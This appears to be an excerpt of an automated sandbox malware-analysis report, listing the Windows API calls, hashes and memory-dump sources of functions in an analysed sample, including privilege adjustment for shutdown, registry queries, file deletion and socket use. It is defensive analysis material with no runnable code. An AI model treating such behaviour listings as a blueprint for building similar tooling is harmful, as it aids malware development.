                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(00DA7B94), ref: 00D5A2F3
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D5A2FD
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A30A
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D5A31A
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00D4E3B4
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                  • Opcode ID: cf53893422437b8d8969577282e73d6211b83bb7ed165653ae8f29b31fa57737
                                                                                                                                                                                                                                                                  • Instruction ID: 99a7c309ea62b80917f821a96c098eae8a1a31e37b335d36269311df42b75da1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf53893422437b8d8969577282e73d6211b83bb7ed165653ae8f29b31fa57737
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 793126311002296EDF10AFA8EC4AADE77ADEF05325F144255EC18E31D0EB31CE898A75
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00D6C10E,?,?), ref: 00D6D415
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D451
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4C8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D6D3F8: _wcslen.LIBCMT ref: 00D6D4FE
                                                                                                                                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00D6C99E
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00D6CA09
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6CA2D
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00D6CA8C
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00D6CB47
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CBB4
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CC49
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00D6CC9A
                                                                                                                                                                                                                                                                  • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00D6CD43
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00D6CDE2
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00D6CDEF
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                  • Opcode ID: 2f01816a6c7e8959b0d6b3a3aa2ffb551715923f5d1c18ecd0ea0436a605a5d8
                                                                                                                                                                                                                                                                  • Instruction ID: d4d07112492dfb4de1b6867c18da8c96cc8decf30496619d0efd132c3da78486
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f01816a6c7e8959b0d6b3a3aa2ffb551715923f5d1c18ecd0ea0436a605a5d8
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0024F71614240AFD714DF28C895E3ABBE5EF48314F18949DF889CB2A2DB31ED46CB61
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4D9CD
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00D4DA88
                                                                                                                                                                                                                                                                  • MoveFileW.KERNEL32(?,?), ref: 00D4DA9B
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DAB8
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00D4DAE2
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00D4DAC7,?,?), ref: 00D4DB5D
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?), ref: 00D4DAFE
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DB0F
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 80dd7cec2d44cacab0c19205ef011f1015c241d68222a88e3a4319be85162405
                                                                                                                                                                                                                                                                  • Instruction ID: e3d1dfafcf341b214f127a6525149dd60bad2c042f9e864b0e3da23876f0f46f
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 80dd7cec2d44cacab0c19205ef011f1015c241d68222a88e3a4319be85162405
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D4613B3180124DAFCF05EBE1CA529EEB7B6AF14300F6441A9E446B7196EB716F09DB60
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Clipboard$AllocCloseEmptyGlobalOpen
• String ID:
• API String ID: 1737998785-0
APIs
  • Part of subcall function 00D42010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
  • Part of subcall function 00D42010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
  • Part of subcall function 00D42010: GetLastError.KERNEL32 ref: 00D42097
• ExitWindowsEx.USER32(?,00000000), ref: 00D4F249
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
• String ID: $ $@$SeShutdownPrivilege
• API String ID: 2234035333-3163812486
APIs
• _free.LIBCMT ref: 00D1BD54
• _free.LIBCMT ref: 00D1BD78
• _free.LIBCMT ref: 00D1BEFF
• GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D846D0), ref: 00D1BF11
• WideCharToMultiByte.KERNEL32(00000000,00000000,00DB221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D1BF89
• WideCharToMultiByte.KERNEL32(00000000,00000000,00DB2270,000000FF,?,0000003F,00000000,?), ref: 00D1BFB6
• _free.LIBCMT ref: 00D1C0CB
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: _free$ByteCharMultiWide$InformationTimeZone
• String ID:
• API String ID: 314583886-0
APIs
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00D256C2,?,?,00000000,00000000), ref: 00D53A1E
• FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00D256C2,?,?,00000000,00000000), ref: 00D53A35
• LoadResource.KERNEL32(?,00000000,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE), ref: 00D53A45
• SizeofResource.KERNEL32(?,00000000,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE), ref: 00D53A56
• LockResource.KERNEL32(00D256C2,?,?,00D256C2,?,?,00000000,00000000,?,?,?,?,?,?,00CE66CE,?), ref: 00D53A65
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Resource$CreateFindGlobalLoadLockSizeofStream
• String ID: SCRIPT
• API String ID: 3051347437-3967369404
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00D41916
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00D41922
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00D41931
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00D41938
                                                                                                                                                                                                                                                                    • Part of subcall function 00D41900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00D4194E
                                                                                                                                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,00D41C81), ref: 00D420FB
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00D42107
                                                                                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 00D4210E
                                                                                                                                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 00D42127
                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00D41C81), ref: 00D4213B
                                                                                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00D42142
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CEB329: _wcslen.LIBCMT ref: 00CEB333
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00D5A5BD
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00D5A6D0
                                                                                                                                                                                                                                                                    • Part of subcall function 00D542B9: GetInputState.USER32 ref: 00D54310
                                                                                                                                                                                                                                                                    • Part of subcall function 00D542B9: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00D543AB
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00D5A5ED
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00D5A6BA
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                                                  • API String ID: 1972594611-438819550
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • DefDlgProcW.USER32(?,?), ref: 00CE233E
                                                                                                                                                                                                                                                                  • GetSysColor.USER32(0000000F), ref: 00CE2421
                                                                                                                                                                                                                                                                  • SetBkColor.GDI32(?,00000000), ref: 00CE2434
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Color$Proc
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 929743424-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00D63AD7
                                                                                                                                                                                                                                                                    • Part of subcall function 00D63AAB: _wcslen.LIBCMT ref: 00D63AF8
                                                                                                                                                                                                                                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00D622BA
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D622E1
                                                                                                                                                                                                                                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00D62338
                                                                                                                                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00D62343
                                                                                                                                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 00D62372
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 1601658205-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 292994002-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,00000400,?), ref: 00D5D8CE
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00D5D92F
                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,?,00000000), ref: 00D5D943
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ErrorEventFileInternetLastRead
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 234945975-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,00D246AC), ref: 00D4E482
                                                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00D4E491
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4E4A2
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4E4AE
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$AttributesCloseFirstlstrlen
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2695905019-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LocalTime
                                                                                                                                                                                                                                                                  • String ID: %.3d$X64
                                                                                                                                                                                                                                                                  • API String ID: 481472006-1077770165
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0000000A), ref: 00D12A8A
                                                                                                                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0000000A), ref: 00D12A94
                                                                                                                                                                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0000000A), ref: 00D12AA1
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 3906539128-0
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D009D8
                                                                                                                                                                                                                                                                    • Part of subcall function 00D0014B: __CxxThrowException@8.LIBVCRUNTIME ref: 00D009F5
                                                                                                                                                                                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00D4205A
                                                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00D42087
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00D42097
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 577356006-0
                                                                                                                                                                                                                                                                  • Opcode ID: ba0beff890d6fc399d19a007c5bcfa3183ece61a2c2a42210b6a1c339254f859
                                                                                                                                                                                                                                                                  • Instruction ID: 04e8ae29c04d2eddb7bf604ff2ca9e56a5cc3d9564c03730902ad0347f2c2b70
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ba0beff890d6fc399d19a007c5bcfa3183ece61a2c2a42210b6a1c339254f859
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B7116DB1414305AFD7289F54EC86E6ABBF9EF44710B20851EF05A96291EB70EC41CA74
APIs
• GetCurrentProcess.KERNEL32(?,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05079
• TerminateProcess.KERNEL32(00000000,?,00D0502E,?,00DA98D8,0000000C,00D05185,?,00000002,00000000), ref: 00D05080
• ExitProcess.KERNEL32 ref: 00D05092
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 97c04059a867e67f36ab88bb1a723f7a9be853e01e0aec3d71cddd6c1ca4c05f
• Instruction ID: 0cd623065470543062864672750e6938f7d36de480712886490fb7b88ba8fad3
• Opcode Fuzzy Hash: 97c04059a867e67f36ab88bb1a723f7a9be853e01e0aec3d71cddd6c1ca4c05f
• Instruction Fuzzy Hash: 17E09231400648AFCB216F64ED09A593B6AEF50385B154054FC4D9A261EB36A982CEB0
APIs
• mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00D4ED04
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: mouse_event
• String ID: DOWN
• API String ID: 2434400541-711622031
• Opcode ID: 889b4f26383d212b7c37fa9fbc1965156269e8f21c422087e546c1b52c2708d8
• Instruction ID: 8de440fd2ffe11f08e1eb522588b184adc26e2b82cd177b6329e3823320710ce
• Opcode Fuzzy Hash: 889b4f26383d212b7c37fa9fbc1965156269e8f21c422087e546c1b52c2708d8
• Instruction Fuzzy Hash: E2E0EC661AD7263EF94821287C07FF6034DAF23734B154246F904E51C0EE955D8665B9
APIs
• GetUserNameW.ADVAPI32(?,?), ref: 00D3E664
Strings
Memory Dump Source
• Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
• Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
Similarity
• API ID: NameUser
• String ID: X64
• API String ID: 2645101109-893830106
• Opcode ID: 5b8838f89a6e0a6d29ed05293bf1e20585e833f1140071312026af944366c4eb
• Instruction ID: df6dfa597363dce39c8ee5d0fa6a5292974a60725260ef74fbad45d80781c51d
• Opcode Fuzzy Hash: 5b8838f89a6e0a6d29ed05293bf1e20585e833f1140071312026af944366c4eb
• Instruction Fuzzy Hash: 35D0C9B480121DEACF90CB90EC88ED9777CBB04304F100A55F146E2140D73095488B20
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00D652EE,?,?,00000035,?), ref: 00D54229
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00D652EE,?,?,00000035,?), ref: 00D54239
Memory Dump Source
